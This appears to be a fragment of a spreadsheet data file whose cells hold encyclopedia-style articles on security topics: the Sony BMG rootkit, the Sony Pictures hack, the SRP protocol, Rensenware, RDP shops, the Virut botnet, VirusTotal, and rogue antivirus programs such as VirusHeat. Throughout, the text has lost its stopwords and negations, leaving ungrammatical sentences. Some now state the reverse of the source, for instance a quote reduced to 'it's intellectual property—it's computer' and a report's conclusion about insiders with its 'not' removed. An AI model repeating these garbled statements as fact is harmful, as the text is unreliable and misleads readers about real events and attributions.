department homeland security publicly admonished sony, stating, "it's intellectual property—it's computer."on november announced also pursuing lawsuit sunncomm mediamax technology. lawsuit also involved issues concerning sony end-user license agreement. reported december 2005 florida attorney general charlie crist investigating sony spyware.on january 2007, u.s. federal trade commission (ftc) announced settlement sony charges copy protection violated federal law—section 5(a) federal trade commission act, 45(a)—by engaging unfair deceptive business practices. settlement required sony reimburse consumers $150 repair damage resulted directly attempts remove software installed without consent. settlement also required provide clear prominent disclosure packaging future limits copying restrictions playback devices, company prohibited installing content-protection software without obtaining consumers' authorization. chairwoman deborah platt majoras added: "installations secret software create security risks intrusive unlawful. consumers' computers belong them, companies must adequately disclose unexpected limitations customer products consumers make informed decisions regarding whether purchase install content." copyright infringement researchers found sony makers also apparently infringed copyright failing adhere licensing requirements various pieces free open-source software used program, including lame encoder, mpglib, faac, id3lib, mpg123 media player.in january 2006, developers lame posted open letter stating expected "appropriate action" sony bmg, developers plans investigate take action apparent violation lame's source-code license. company press reports russinovich's report discussed popular blogs almost immediately following release.npr first major news outlets report scandal november 2005. thomas hesse, sony bmg's president global digital business, said: "most people, think, even know rootkit care it?"in november 2005 article, vnunet.com summarized russinovich's findings urged consumers temporarily avoid purchasing sony music cds. following day, boston globe classified software spyware, computer associates' etrust security management unit steve curry confirmed rootkit communicates personal information consumers' computers (the played user's address) sony bmg. methods used software avoid detection likened used data thieves. november 2005, computer associates classified sony bmg's software spyware provided tools removal. russinovich said: "this step taken immediately."the first virus exploit sony bmg's stealth technology make malicious files invisible user antivirus programs surfaced november 2005. later, yahoo! news announced sony suspended distribution controversial technology. zdnet news wrote: "the latest risk uninstaller program distributed sunncomm technologies, company provides copy protection sony releases." uninstall program obeys commands sent allowing others take control uninstaller used."on december 2005, sony revealed million spanning titles shipped mediamax software. company announced availability software patch prevent potential security breach consumers' computers. sony australia issued press release indicating sony titles manufactured australia contained copy protection. also defective design list compact discs sold extended copy protection list compact discs sold mediamax cd-3 references sources "sony music under fire privacy advocates", national public radio, 2005-11-04 bergstein, brian (2005-11-18). "copy protection experiment progress". seattlepi.com. halderman, alex, felten, edward. "lessons sony episode" (pdf format), center information technology policy, department computer science, princeton university, 2006-02-14. wikinews: sony's protected install windows rootkits gartner: sony public-relations technology failure bush administration sony: it's intellectual property computer 2005-11-12 newswire article external links academic article examining market, legal, technological factors motivated sony bmg's strategy list titles affected mediamax list titles affected list titles included settlement sonysuit.com tracking sony suncomm lawsuits "sony anti-customer technology roundup time-line", boing boing. in-depth analysis references, groklaw revisiting sony rootkit scandal years later</t>
  </si>
  <si>
    <t>SpankChain</t>
  </si>
  <si>
    <t>spankchain adult entertainment website cryptocurrency exchange mostly used exchanges work industry. users services using spankchain ethereum-based coin "spank". spankchain's tokens sometimes referred "spankcoin". history april 2018, spankchain offered $25,000 reward workers revealed information political clients supported passing fosta/sesta acts, regulated work united states. company reportedly 6,000 users october 2018.in 2018, malicious attacker stole ethers (valued $40,000) spankchain exploiting vulnerability ethereum blockchain. after cryptocurrency bubble 2018 burst, company downsized eight employees. references external links https://spankchain.com</t>
  </si>
  <si>
    <t>Sony Pictures hack</t>
  </si>
  <si>
    <t>november 2014, hacker group identifying "guardians peace" leaked release confidential data film studio sony pictures entertainment (spe). data included personal information sony pictures employees families, emails employees, information executive salaries company, copies then-unreleased sony films, plans future sony films, scripts certain films, information. perpetrators employed variant shamoon wiper malware erase sony's computer infrastructure.during hack, group demanded sony withdraw then-upcoming film interview, comedy plot assassinate north korean leader jong-un, threatened terrorist attacks cinemas screening film. after many major u.s. theater chains opted screen interview response threats, sony chose cancel film's formal premiere mainstream release, opting skip directly downloadable digital release followed limited theatrical release next day.united states intelligence officials, evaluating software, techniques, network sources used hack, alleged attack sponsored government north korea, since denied responsibility. hack perpetrators exact duration hack unknown. u.s. investigators culprits spent least months copying critical files. purported member guardians peace (gop) claimed performed hack stated access least year prior discovery november 2014, according wired. hackers involved claim taken terabytes data sony, claim never confirmed. attack conducted using malware. although sony specifically mentioned advisory, us-cert said attackers used server message block (smb) worm tool conduct attacks major entertainment company. components attack included listening implant, backdoor, proxy tool, destructive hard drive tool, destructive target cleaning tool. components clearly suggest intent gain repeated entry, extract information, destructive, well remove evidence attack.sony made aware hack monday, november 2014, malware previously installed rendered many sony employees' computers inoperable software, warning group calling guardians peace, along portion confidential data taken hack. several sony-related twitter accounts also taken over. this followed message several sony pictures executives received email previous friday, november message, coming group called "god'sapstls" [sic], demanded "monetary compensation" otherwise, "sony pictures bombarded whole". this email message mostly ignored executives, lost volume received treated spam email. addition activation malware november message included warning sony decide course action 11:00 p.m. evening, although apparent threat made deadline passed. days following hack, guardians peace began leaking yet-unreleased films started release portions confidential data attract attention social media sites, although specify wanted return. sony quickly organized internal teams manage loss data internet, contacted private security firm fireeye help protect sony employees whose personal data exposed hack, repair damaged computer infrastructure trace source leak. first public report concerning north korean link attack published re/code november later confirmed news. december 2014, alongside eighth large data dump confidential information, guardians peace threatened sony language relating september attacks drew attention u.s. security agencies. north korean state-sponsored hackers suspected united states involved part specific threats made toward sony movie theaters showing interview, comedy film assassination attempt jong-un. north korean officials previously expressed concerns film united nations, stating allow production distribution film assassination incumbent head sovereign state regarded undisguised sponsoring terrorism well war."in first quarter financials 2015, sony pictures aside million deal ongoing damages hack. sony bolstered cyber-security infrastructure result, using solutions prevent similar hacks data loss future. sony co-chairperson pascal announced wake hack would step 2015, instead become involved film production sony. information obtained according notice letter dated december 2014, employees, learned december 2014, personally identifiable information employees dependents obtained unauthorized individuals result "brazen cyber-attack", including names, addresses, social security numbers financial information. december 2014, c-span reported hackers stole 47,000 unique social security numbers computer network.although personal data stolen, early news reports focused mainly celebrity gossip embarrassing details hollywood film industry business affairs gleaned media electronic files, including private email messages. among information revealed emails sony kazuo hirai pressured sony pictures co-chairwoman pascal "soften" assassination scene interview. many details relating actions sony pictures executives, including pascal michael lynton, also released, manner appeared intended spur distrust executives employees sony.other emails released hack showed pascal scott rudin, film theatrical producer, discussing angelina jolie. emails, rudin referred jolie minimally talented spoiled brat" jolie wanted david fincher direct film cleopatra, rudin felt would interfere fincher directing planned film steve jobs. pascal rudin also noted email exchange pascal's upcoming encounter barack obama included characterizations described racist, pascal's resignation sony. suggested mention films african-americans upon meeting president, django unchained, years slave butler, depict slavery united states pre-civil rights era. pascal rudin later apologized. details lobbying efforts politician mike moore behalf digital citizens alliance fairsearch google also revealed.the leak revealed multiple details behind-the-scenes politics columbia pictures' current spider-man film series, including emails pascal others various heads marvel studios. outcry fans, spider-man license eventually negotiated shared studios. addition emails, copy screenplay james bond film spectre, released 2015, obtained. several future sony pictures films, including annie, turner, still alice write love arms, also leaked. hackers intended release additional information december 2014, coincided release date interview united states. according daily dot, based email leaks, sony, executive charles sipkins responsible following senior executives' orders edit wikipedia articles them.in december 2014, former sony pictures entertainment employees filed four lawsuits company protecting data released hack, included social security numbers medical information. part emails, revealed sony talks nintendo make animated film based super mario bros. series (which came fruition years later, albeit universal illumination instead sony).in january 2015, details revealed mpaa's lobbying united states international trade commission mandate u.s. isps either internet transit level consumer level internet service provider, implement address blocking pirate websites well linking websites. wikileaks published 30,000 documents obtained hack april 2015, founder julian assange stating document archive "shows inner workings influential multinational corporation" made public.in november 2015, charlie sheen revealed positive television interview matt lauer, revealed information diagnosis leaked email senior sony bosses dated march 2014. december, snap inc., hack, revealed acquired vergence labs million cash stock, developers epiphany eyewear, mobile scan $150 million. threats surrounding interview december first time since hack, "guardians peace" mentioned then-upcoming film interview name, threatened take terrorist actions film's york city premiere sunshine cinema december well american wide release date, december sony pulled theatrical release following day. clearly show time places interview shown, including premiere, bitter fate seek terror doomed soon world awful movie sony pictures entertainment made. world full fear. remember 11th september 2001. recommend keep distant places time. house nearby, better leave.) whatever comes coming days called greed sony pictures entertainment. world denounce sony. seth rogen james franco, stars interview, responded saying know definitely caused film, later canceled media appearances tied film outside planned york city premiere december 2014. following initial threats made towards theaters would show interview, several theatrical chains, including carmike cinemas, cinemas, regal entertainment group, showcase cinemas, theatres, cinemark theatres, well several independent movie theater owners announced would screen interview. day, sony stated would allow theaters showing interview, later decided fully pull national december release film, well announce release plans" release film platform, including home video, foreseeable future.on december messages (both allegedly guardians peace) released. one, sent private message sony executives, stated would release information sony never releases film removed presence internet. other, posted pastebin, application used text storage guardians peace used previous messages, stated studio "suffered enough" could release interview, jong-un's death scene "too happy". post also stated company cannot "test [them] again", [sony pictures] makes anything else, [they] ready fight".president barack obama, end-of-year press speech december commented sony hacking stated felt sony made mistake pulling film, producers "not pattern intimidated acts". also said, respond proportionally respond place time manner choose." response president obama's statement, sony entertainment's michael lynton said program anderson cooper public, press president misunderstood events. lynton said decision cancel wide release response majority theaters pulling showings hackers' threats. lynton stated would seek options distribute film future, noted given backed down. always every desire american public movie."on december sony opted authorize approximately mostly-independent theaters show interview christmas day, four major theater chains change earlier decision show film. worked theaters detail specifics prior threats manage security showings, noted actionable intelligence prior threats. sony's lynton stated announcement proud make available public stood attempted suppress free speech". interview also released google play, xbox video, youtube december incidents predicated threats occurred release, instead, unorthodox release film considered success increased interest film following attention received.on december north korean national defence commission released statement accusing obama "the chief culprit forced sony pictures entertainment indiscriminately distribute movie." u.s. accusations formal charges north korea u.s. government officials stated december 2014 belief north korean government "centrally involved" hacking, although initially debate within white house whether make finding public. white house officials treated situation "serious national security matter", federal bureau investigation (fbi) formally stated december connected north korean government cyber-attacks. including undisclosed evidence, claims made based similar malicious hacking tools techniques previously employed north korean hackers—including north korea's cyberwarfare agency bureau south korean targets. according fbi: "[a] technical analysis data deletion malware used attack revealed links malware knows north korea previously developed. example, similarities specific lines code, encryption algorithms, data deletion methods, compromised networks. "the also observed significant overlap infrastructure used attack malicious cyber activity u.s. government previously linked directly north korea. example, discovered several internet protocol (ip) addresses associated known north korean infrastructure communicated addresses hardcoded data deletion malware used attack. later clarified source addresses associated group north korean businesses located shenyang northeastern china. "separately, tools used attack similarities cyber-attack march last year south korean banks media outlets, carried north korea."the later clarified details attacks, attributing north korea noting hackers "sloppy" proxy addresses originated within north korea. point hackers logged guardians peace facebook account sony's servers without effective concealment. director james comey stated internet access tightly controlled within north korea, such, unlikely third party hijacked addresses without allowance north korean government. national security agency assisted analyzing attack, specifically reviewing malware tracing origins; director admiral michael rogers agreed attack originated north korea. disclosed report published spiegel stated agency become aware origins hack cyber-intrusion north korea's network 2010, following concerns technology maturation country.the north korean news agency kcna denied "wild rumours" north korean involvement, said "the hacking sony pictures might righteous deed supporters sympathizers dprk response appeal." north korea offered part joint probe united states determine hackers' identities, threatening consequences united states refused collaborate continued allegation. u.s. refused asked china investigative assistance instead. some days fbi's announcement, north korea temporarily suffered nationwide internet outage, country claimed united states' response hacking attempts.on following fbi's accusation north korea's involvement, received email purportedly hacking group, linking youtube video entitled "you idiot!", apparently mocking organization.on december 2014, u.s. secretary homeland security johnson released statement saying, "the cyber attack sony pictures entertainment attack company employees. also attack freedom expression life." encouraged businesses organizations cybersecurity framework developed national institute standards technology (nist) assess limit cyber risks protect cyber threats. day, u.s. secretary state john kerry published remarks condemning north korea cyber-attack threats movie theatres moviegoers. "this provocative unprecedented attack subsequent threats strengthen resolve continue work partners around world strengthen cybersecurity, promote norms acceptable state behavior, uphold freedom expression, ensure internet remains open, interoperable, secure reliable," said.on january 2015, u.s., executive order issued president obama, installed additional economic sanctions already-sanctioned north korea hack, north korean officials called "groundlessly stirring blood towards" country. doubts accusations north korea cyber security expert kurt stammberger cyber security firm norse, defcon organizer cloudflare researcher marc rogers, hector monsegur zetter, security journalist wired magazine, expressed doubt tended agree north korea might behind attack. michael hiltzik, journalist angeles times, said evidence north korea "circumstantial" cybersecurity experts "skeptical" attributing attack north koreans. cybersecurity expert lucas zaichkowsky said, "state-sponsored attackers create cool names like 'guardians peace' promote activity public." zetter wired magazine called released evidence government "flimsy". former hacker hector monsegur, hacked sony, explained news exfiltrating hundred terabytes data "without anyone noticing" would taken months years, weeks. monsegur doubted accusations north korea's insufficient internet infrastructure handle transfer much data. believed could either chinese, russian, north korean-sponsored hackers working outside country, likely deed sony employee.stammberger provided norse's findings suggest hack inside job, stating, "sony hacked; company essentially nuked inside. confident attack master-minded north korea insiders implementation devastating attacks history." stammberger believes security failure originated disgruntled former sony employees, based past skill sets discussions people made chat rooms. norse employees identified people list workers eliminated sony restructuring 2014, noted made public angry responses firing, would appropriate positions identify means access secure parts sony's servers. after private briefing lasting three hours, formally rejected norse's alternative assessment.seth rogen also expressed doubts claims north korea behind hack. based timeline events amount information hacked, believes hack conducted sony employee. "i've also heard people think someone hired hack getting pascal fired. know subscribe theories, kind think north korea." other investigations response allegations intrusion result inside job, something state-sponsored cyber attack, computer forensic specialist kevin mandia, president security firm fireeye, commented "shred evidence" insider responsible attack evidence uncovered security firm supports position united states government.in february 2016, analytics firm novetta issued joint investigative report attack. report, published collaboration kaspersky lab, symantec, alienvault, invincea, trend micro, carbon black, punchcyber, riskiq, threatconnect volexity, concluded well-resourced organization committed intrusion, strongly believe attack work insiders hacktivists". analysis said group engaged military espionage campaigns. because depth scope malware tools, structure analyzed code bases, overlap similar attacks, long trail activities attributed lazarus group, novetta believe attack carried insiders hacktivists, rather structured, resourced, motivated organization. although analysis cannot support direct attribution nation-state specific group difficulty proper attribution cyber realm, fbi's official attribution claims could supported findings. formal charges u.s. department justice issued formal charges related sony hack north korean citizen park jin-hyok september 2018. department justice contends park north korean hacker worked country's reconnaissance general bureau, equivalent central intelligence agency. department justice also asserted park partially responsible arranging wannacry ransomware attack 2017, developed part ransomware software. department justice previously identified park monitoring time, could indict immediately much information around classified. criminal complaint unsealed department justice press release september 2018. legal responses obama also issued legislative proposal congress update current laws racketeer influenced corrupt organizations introduce ones allow federal national enforcement officials better respond cybercrimes like sony hack, able prosecute crimes compatibly similar off-line crimes, protecting privacy americans. governmental responses less month following attack, north korea reportedly lost connection internet. although united states' government take credit, president obama announced united states would carry “proportional response” light sony hack. public discussion about reporting hack december 2014, sony requested media stop covering hack. sony also threatened legal action media comply, according professor eugene volokh, sony's legal threats "unlikely prevail". sony threatened legal action twitter suspend accounts people posted hacked material. american screenwriter aaron sorkin wrote op-ed york times opining media helping hackers publishing reporting leaked information. december reddit took unusual step banning subreddit r/sonygop used distribute hacked files. about pulling interview threats made directly sony interview seen many threat free speech. decision pull film criticized several hollywood filmmakers, actors, television hosts, including stiller, steve carell, lowe, jimmy kimmel judd apatow. some commentators contrasted situation non-controversial release 2004 team america: world police, film mocked leadership north korea's prior leader, jong-il. alamo drafthouse poised replace showings interview team america film's distributor paramount pictures ordered theaters stop.in light threats made sony interview, regency cancelled march 2015 production plans film adaptation graphic novel pyongyang: journey north korea, star steve carell. hustler announced intentions make pornographic parody film interview. hustler founder larry flynt said, jong-un henchmen upset before, wait till movie we're going make". outside united states china, media coverage hackings limited outside sources censored. search "north korea hack" baidu, china's leading search engine returned article, named north korea "one several suspects." however, google, inaccessible china, returned million results query. chunying, spokeswoman foreign affairs, "shied away directly addressing" sony hacking situation. also 2013 south korea cyberattack 2015–16 swift banking hack north korea's illicit activities references</t>
  </si>
  <si>
    <t>Secure Remote Password protocol</t>
  </si>
  <si>
    <t>secure remote password protocol (srp) augmented password-authenticated exchange (pake) protocol, specifically designed work around existing patents.like pake protocols, eavesdropper middle cannot obtain enough information able brute-force guess password apply dictionary attack without interactions parties guess. furthermore, augmented pake protocol, server store password-equivalent data. this means attacker steals server data cannot masquerade client unless first perform brute force search password. layman's terms, pake protocol) authentication, party (the "client" "user") demonstrates another party (the "server") know password, without sending password information password derived. password never leaves client unknown server. furthermore, server also needs know password (but password itself) order instigate secure connection. this means server also authenticates client prevents phishing without reliance user parsing complex urls. newer alternative algorithms include aucpace opaque overview protocol number desirable properties: allows user authenticate server, resistant dictionary attacks mounted eavesdropper, require trusted third party. effectively conveys zero-knowledge password proof user server. revision protocol password guessed connection attempt. interesting properties protocol even cryptographic primitives uses attacked, still secure. protocol revised several times, currently revision protocol creates large private shared parties manner similar diffie–hellman exchange based client side user password server side cryptographic verifier derived password. shared public derived random numbers, generated client, generated server, unique login attempt. cases encrypted communications well authentication required, protocol secure alternative protocol faster using diffie–hellman exchange signed messages. also independent third parties, unlike kerberos. protocol, version described 2945. version also used strong password authentication ssl/tls tls-srp) standards saml, standardized ieee p1363 iso/iec 11770-4. protocol following notation used description protocol, version chosen prime (which makes sophie germain prime safe prime). must large enough computing discrete logarithms modulo infeasible. arithmetic performed ring integers modulo {\displaystyle \scriptstyle \mathbb _{n}} this means read gxmod generator multiplicative group {\displaystyle \scriptstyle \mathbb _{n}^{*}} hash function; e.g., sha-256. parameter derived sides; srp-6, srp-6a derived h(n, used prevent 2-for-1 guess active attacker impersonates server. small salt. identifying username. user's password. host's password verifier, minimum h(s, computed client free choose stronger algorithm. implementation could choose without affecting steps required host. standard rfc2945 defines within avoids malicious server able learn users share password. random time ephemeral keys user host respectively. (pipe) denotes concatenation.all variables defined terms these. first, establish password server steve, client carol picks small random salt computes h(s, steve stores indexed carol's password verifier salt. carol must share anybody, must safely erase step, equivalent plaintext password this step completed system used part user registration steve. note salt shared exchanged negotiate session later value could chosen either side done carol register single registration request. transmission authentication registration request covered srp. then perform proof password later date following exchange protocol occurs: carol steve: generate random value send steve carol: generate random value send both: h(a, carol: scarol kgx)(a kgx)(a (kgx gb)(a (gb)(a carol: kcarol h(scarol) steve: ssteve (avu)b (gavu)b [ga(gx)u]b ux)b (gb)(a steve: ksteve h(ssteve) kcarolnow parties shared, strong session complete authentication, need prove keys match. possible follows: carol steve: h[h(n) h(g) h(i) kcarol]. steve verifies steve carol: ksteve). carol verifies m2.this method requires guessing shared state successful impersonation key. while additional state public, private information could safely added inputs hash function, like server private key.alternatively, password-only proof calculation skipped shared proven with: carol steve: scarol). steve verifies steve carol: ssteve). carol verifies m2.when using negotiate shared immediately used negotiation verification steps skipped. server reject first request client cannot decrypt. skipping verification steps dangerous.the parties also employ following safeguards: carol abort receives (mod steve abort receives (mod carol must show proof first. steve detects carol's proof incorrect, must abort without showing proof example code python implementations srp-6 variables java library cryptographic primitives required implement srp-6 protocol. openssl version 1.0.1 later. botan (the crypto library) contains implementation srp-6a tls-srp ciphersuites transport layer security uses srp. srp-client srp-6a implementation javascript (compatible 5054), open source, mozilla public license (mpl) licensed. javascript crypto library includes javascript implementation protocol, open source, licensed. crypto provide java implementation licensed general public license "library exception", permits library conjunction non-free software. legion bouncy castle provides java implementations license. nimbus java library providing verifier generator, client server-side sessions. includes interfaces custom password key, client server evidence message routines. external dependencies. released apache license. srplibcpp implement base miracl. dragonsrp modular implementation currently works openssl. json2ldap provides srp-6a authentication ldap directory servers. csrp srp-6a implementation crypt-srp srp-6a implementation perl. pysrp srp-6a implementation python (compatible csrp). py3srp srp-6a implementation pure python3. srptools tools implement secure remote password (srp) authentication python. verified compatible libraries. meteor framework's accounts system implements password authentication. srp-rb srp-6a implementation ruby. falkmueller demo srp-6a implementation stanford protocol design javascript license. srp-6a-demo srp-6a implementation javascript. thinbus-srp-js srp-6a implementation javascript. comes compatible java classes nimbus demonstration using spring security. there also demonstration application performing authentication server. released apache license. stanford javascript crypto library (sjcl) implements exchange. node-srp javascript client server (node.js) implementation srp. srp6 java implementation java. alosrpauth objective-c implementation srp-6a. go-srp implementation srp-6a. tssrp6a typescript implementation srp-6a. theicenet cryptography java library develop cryptography-based spring boot applications. implements srp-6a. under apache license. srp-6a .net implementation srp-6a apple homekit apple homekit uses pairing "smart" home accessories devices protonmail authentication email encryption implementation srp, used authenticate users posterity. also challenge–response authentication password-authenticated agreement salted challenge response authentication mechanism (scram) simple password exponential exchange zero-knowledge password proof references external links official website license—bsd like open source. us6539479 patent (expired 2015 failure maintenance fees (according google patents). originally expire july 2018). manual pages pppd(8): point-to-point protocol daemon srptool(1): simple password tool rfcs 2944 telnet authentication: 2945 authentication exchange system (version 3720 internet small computer systems interface (iscsi) 3723 securing block storage protocols 3669 guidelines working groups intellectual property issues 5054 using secure remote password (srp) protocol authentication other links ieee 1363 intellectual property slides (dec 2001 possible deprecated) patents mentioned expired 2011 2013.</t>
  </si>
  <si>
    <t>Secure Password Authentication</t>
  </si>
  <si>
    <t>secure password authentication (spa) proprietary microsoft protocol used authenticate microsoft email clients electronic mail server using simple mail transfer protocol (smtp), post office protocol (pop), internet message access protocol (imap). protocol based integrated windows authentication (ntlm) authentication scheme. references</t>
  </si>
  <si>
    <t>Rensenware</t>
  </si>
  <si>
    <t>rensenware (蓮船ウェアー, 련선웨어; stylized rensenware) ransomware infects windows computers. this ransomware created joke korean programmer kangjun (허강준) (alias "0x00000ff"). ransomware discovered april 2017. rensenware unusual example ransomware request user creator virus decrypt files, instead requiring user achieve required number points 2009 bullet hell video game touhou seirensen undefined fantastic object decryption take place. main window displays minamitsu murasa, character game. payload when running, encrypts user's files certain extensions. once files encrypted, warning window cannot closed appears. program forces user play touhou seirensen undefined fantastic object, included ransomware must download own, play "lunatic" mode least million points, order decrypt files (the program automatically detects game's process "th12" accumulated points). advised user kill rensenware main program files decrypted, otherwise, user lose files permanently. users affected (including creator self-infected), developer created program "decrypt" files (which basically "cheats" th12 setting custom score injecting game, satisfying rensenware program requirements), ones want prevent infection, created another program. creator also released small part source code github (without payload).the programmer rensenware accidentally infected himself, found unable necessary score. later uploaded piece software neutralised rensenware onto github, along apology. references external links this article incorporates material derived "rensenware" article malware wiki fandom (formerly wikia) licensed creative commons attribution-share alike license (december 2019).</t>
  </si>
  <si>
    <t>RDP shop</t>
  </si>
  <si>
    <t>shop website access hacked computers sold cybercriminals. computers acquired scanning open remote desktop protocol connections brute-forcing passwords. high-value ransomware targets sometimes available airports. access compromised machine retails depending automatically gathered system network metrics using standardised back door.russian sites xdedic sell access machines within former soviet nations. references</t>
  </si>
  <si>
    <t>Sophos</t>
  </si>
  <si>
    <t>sophos group british based security software hardware company. sophos develops products communication endpoint, encryption, network security, email security, mobile security unified threat management. sophos primarily focused providing security software 5,000-seat organizations. while primary focus, sophos also protects home users, free paid antivirus solutions (sophos home/home premium) intended demonstrate product functionality. listed london stock exchange acquired thoma bravo february 2020. history sophos founded hruska peter lammer began producing first antivirus encryption products 1985. during late 1980s 1990s, sophos primarily developed sold range security technologies including encryption tools available users (private business). late 1990s, sophos concentrated efforts development sale antivirus technology, embarked program international expansion.in 2003, sophos acquired activestate, north american software company developed anti-spam software. time viruses spread primarily email spam allowed sophos produce combined anti-spam antivirus solution. 2006, peter gyenes steve munford named chairman sophos, respectively. hruska peter lammer remain members board directors. 2010, majority interest sophos sold apax. 2010, nick bray, formerly group micro focus international, named sophos.in 2011, utimaco safeware (acquired sophos 2008–9) accused supplying data monitoring tracking software partners sold governments syria: sophos issued statement apology confirmed suspended relationship partners question launched investigation. 2012, kris hagerman, formerly corel corporation, named sophos joined company's board. former steve munford became non-executive chairman board. february 2014, sophos announced acquired cyberoam technologies, provider network security products. june 2015, sophos announced plans raise $us100 million london stock exchange. sophos floated ftse september 2015.on october 2019 sophos announced thoma bravo, us-based private equity firm, made offer acquire sophos us$7.40 share, representing enterprise value approximately $3.9 billion. board directors sophos stated intention unanimously recommend offer company's shareholders. march 2020 sophos announced completion acquisition. acquisitions partnerships from september 2003 february 2006, sophos served parent company activestate, developer programming tools dynamic programming languages: february 2006, activestate became independent company sold vancouver-based venture capitalist firm pender financial. 2007, sophos acquired endforce, company based ohio, united states, developed sold security policy compliance network access control (nac) software. 2011, sophos announced acquisition astaro, privately held provider network security solutions, headquartered wilmington, massachusetts, karlsruhe, germany. time astaro largest vendor deal made sense time forbes questioned viability. sophos subsequently renamed astaro sophos utm. november 2016, sophos acquired barricade, pioneering start-up powerful behavior-based analytics engine built machine learning techniques, strengthen synchronized security capabilities next-generation network endpoint protection. february 2017, sophos acquired invincea, software company provides malware threat detection, prevention, pre-breach forensic intelligence.in march 2020, thoma bravo acquired sophos $3.9 billion. also antivirus software comparison antivirus software comparison computer viruses comparison firewalls cryptography identity-based security references external links official website</t>
  </si>
  <si>
    <t>Symantec Online Backup</t>
  </si>
  <si>
    <t>symantec online backup online remote backup service provides businesses system backing storing computer files internet. released february, 2008 symantec protection network platform. symantec online backup example cloud computing saas (software service). sales symantec online backup discontinued january 2010. references related information symantec backup exec on-premises backup recovery software small medium enterprises external links symantec protection network site symantec online backup details</t>
  </si>
  <si>
    <t>SourceForge Installer</t>
  </si>
  <si>
    <t>sourceforge installer discontinued piece software included downloads sourceforge. often bundled adware crapware designed trick people installing unwanted software. sourceforge criticized installer. opinions feature vary, complaining users aware getting able trust downloaded content, whereas others reasonably harmless option keeps individual projects users control. history july 2013, sourceforge started allowing project owners sign devshare. when project owner signed this, closed-source installer would placed project. while people opposed many projects began using devshare part revenue given owner. notable project filezilla, open-source software. early 2016, devshare sourceforge installer discontinued bizx bought sourceforge. references</t>
  </si>
  <si>
    <t>Virut</t>
  </si>
  <si>
    <t>virut cybercrime malware botnet, operating least since 2006, major botnets malware distributors internet. january 2013 operations disrupted polish organization naukowa akademicka sieć komputerowa. characteristics virut malware botnet known used cybercrime activities ddos attacks, spam collaboration waledac botnet), fraud, data theft, pay-per-install activities. spreads executable file infection (through infected sticks media), recently, compromised html files (thus infecting vulnerable browsers visiting compromised websites). infected computers associated least 890,000 addresses poland. 2012, symantec estimated botnet control 300,000 computers worldwide, primarily egypt, pakistan southeast asia (including india). kaspersky report listed virut fifth-most widespread threat third quarter 2012, responsible 5.5% computer infections. history virut botnet active since least 2006.on january 2013, polish research development organization, data networks operator, operator polish ".pl" top-level domain registry, naukowa akademicka sieć komputerowa (nask), took twenty three domains used virut attempt shut down. nask spokesperson stated first time nask engaged operation (taking domains), owing major threat virut botnet posed internet. likely virut shut completely, control servers located russian ".ru" top-level domain name registrars outside reach polish nask. further, botnet able look alternate backup hosts, enabling criminals operating reestablish control network. also command control (malware) zombie (computer science) trojan horse (computing) botnet alureon conficker gameover zeus zeroaccess botnet regin (malware) zeus (malware) timeline computer viruses worms references</t>
  </si>
  <si>
    <t>VirusTotal</t>
  </si>
  <si>
    <t>virustotal website created spanish security company hispasec sistemas. launched june 2004, acquired google september 2012. company's ownership switched january 2018 chronicle, subsidiary google. virustotal aggregates many antivirus products online scan engines called contributors. november, 2018, cyber national mission force, unit subordinate u.s. cyber command became contributor. aggregated data contributors allows user check viruses user's antivirus software missed, verify false positives. files uploaded website, sent email (max. 32mb). anti-virus software vendors receive copies files flagged scans passed engine, help improve software and, extension, virustotal's capability. users also scan suspect urls search virustotal dataset. virustotal uses cuckoo sandbox dynamic analysis malware. virustotal selected world best products 2007. products services windows uploader virustotal's windows uploader application integrates explorer's (right-click) contextual menu, listed send virus total. application also launches manually submitting program currently running virustotal stores name various hashes scanned file. already scanned files identified known (e.g., default) sha256 hash without uploading complete files. sha256 query form https://www.virustotal.com/latest-scan/sha256. file uploads normally limited 2017 virustotal discontinued support windows uploader. uploader linux same windows upload file (via app's context menu) given back result. downloaded website. however, need compile build linux using core (provided repository) used application. already scanned files identified known (e.g., default) sha256 hash without uploading complete files. virustotal browsers there several browser extensions available, vt4browsers mozilla firefox, google chrome vtexplorer internet explorer. they allow user download files directly virustotal's application prior storing computer, well scanning urls. virustotal mobile service also offers android employs public search installed application virustotal's previously scanned ones show status. application previously scanned submitted, must provided restrictions public usage apply (see #public api). public virustotal provides free service public allows automation online features "upload scan files, submit scan urls, access finished scan reports make automatic comments urls samples". some restrictions apply requests made public api, requiring individual freely obtained online signing priority scan queue, limited number requests time frame, etc. antivirus products antivirus engines used detection uploading files. website/domain scanning engines datasets antivirus scanning engines used scanning. file characterization tools datasets utilities used provide additional info uploaded files. privacy files uploaded virustotal shared freely anti-malware companies also retained store. virustotal about page states virustotal confidentiality: files urls sent virustotal shared antivirus vendors security companies help improving services products. believe eventually lead safer internet better end-user protection. default file/url submitted virustotal detected least scanner freely sent scanners detect resource. additionally, files urls enter private store accessed premium (mainly security/antimalware companies/organizations) virustotal users improve security products services. references external links official website</t>
  </si>
  <si>
    <t>VirusProtectPro</t>
  </si>
  <si>
    <t>virusprotectpro rogue malware program claims commercial anti-spyware, fact itself, adware-advertised. software installs itself, without consent, user's computers registry. sends messages "system error, software fix" "your system infected spyware, virusprotectpro clean it", redirecting user virusprotectpro's homepage prompted virusprotectpro software.there many variants rogue family including: antivirgear, spywarestrike, spyfalcon, spywarequake, malwarewipe, spylocked, spydawn. external links free easy removal process removal instructions information more removal instructions virusprotectpro. removal method video youtube references</t>
  </si>
  <si>
    <t>VirusHeat</t>
  </si>
  <si>
    <t>virusheat malware disguises legitimate anti-virus program. virusheat tricks users buying full version program repeated false alerts popups, purporting alert user system error infected, must full version remove. launched february 2008. infection virusheat usually downloaded trojan, usually zlob trojan, bundled fake video codecs. also downloaded malware's website. once installed, virusheat scan report exaggerated results user's computer infected. when scan complete, warning message linking virusheat's homepage user prompted software. symptoms virusheat displays false warning messages (e.g. imitating downloaded e.g. video) followed realistic virus removal launches web-site whether select "yes" "no" button: then uses exaggerated scan reports mislead user. virusheat repeatedly annoys user warnings prompt user purchase full version program. virusheat attempt change user's homepage virusheat's homepage. virusheat automatically launch startup. virusheat installs following: processes virusheat virusheat 3.9.exedlls eeioq.dll iinqyl.dll wuuawkz.dlldirectories c:\program files\virusheatregistry keys hkey_classes_root\clsid\{5b55c4e3-c179-ba0b-b4fd-f2db862d6202} known variants virusheat behaves similar known rogue security software. spywarequake, virusburst, antivirgear, virusprotect, virusprotectpro variants virusheat. removal various anti-spyware removal tools known remove virusheat. latest definition file must utilized anti-spyware programs completely remove virusheat associated files. also malware spyware adware rogue security software wikipedia's spyware removal category references symantec.com virusheat misleading application give exaggerated reports threats computer research.sunbelt-software.com virusheat rogue security program known scaremongering, high-pressure advertising practices virusheat.com safety ratings mcafee siteadvisor 